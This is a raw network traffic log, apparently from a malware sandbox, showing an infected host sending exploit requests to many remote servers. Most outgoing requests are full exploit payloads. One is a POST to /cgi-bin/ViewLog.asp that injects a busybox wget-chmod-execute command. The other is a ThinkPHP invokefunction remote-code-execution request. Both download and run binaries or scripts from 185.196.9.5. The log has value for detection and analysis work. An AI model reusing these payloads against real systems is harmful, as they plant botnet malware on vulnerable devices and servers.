Feb 25, 2024 19:03:25.867552042 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:26.061224937 CET	645	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:25 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 74 20 50 48 50 2f 38 2e 30 2e 32 38 20 53 65 72 76 65 72 20 61 74 20 31 38 35 2e 31 39 36 2e 39 2e 35 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Server at 185.196.9.5 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
381	192.168.2.15	48084	94.123.33.30	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.900069952 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
382	192.168.2.15	48612	94.121.31.236	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.900216103 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
383	192.168.2.15	59740	94.123.42.47	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.905339003 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
384	192.168.2.15	39260	94.121.111.43	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.905494928 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
385	192.168.2.15	60470	95.101.58.131	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:25.916276932 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:26.205981016 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:26 GMT Date: Sun, 25 Feb 2024 18:03:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 32 35 61 33 33 62 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 30 36 26 23 34 36 3b 31 64 36 30 36 64 39 65 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b25a33b8.1708884206.1d606d9e</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
386	192.168.2.15	33262	95.169.192.197	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:26.048338890 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:26.234988928 CET	495	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 301 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 31 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Ubuntu) Server at 127.0.1.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
387	192.168.2.15	59344	95.85.86.117	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:26.143213034 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
388	192.168.2.15	56572	95.53.246.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:26.147582054 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:26.380287886 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:34 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
389	192.168.2.15	49426	95.35.31.183	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:26.179199934 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:27.137204885 CET	516	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Content-Length: 349 Connection: close Date: Sun, 25 Feb 2024 21:03:11 GMT Server: lighttpd/1.4.45 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
390	192.168.2.15	51366	95.217.25.126	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.345155954 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:28.544225931 CET	339	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sun, 25 Feb 2024 18:03:28 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
391	192.168.2.15	40656	95.216.62.203	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:28.348823071 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:28.550931931 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:28 GMT Server: Apache Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Feb 25, 2024 19:03:28.550947905 CET	1286	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Feb 25, 2024 19:03:28.552026987 CET	1286	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Feb 25, 2024 19:03:28.552176952 CET	1286	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Feb 25, 2024 19:03:28.552196026 CET	1286	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Feb 25, 2024 19:03:28.552249908 CET	1286	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
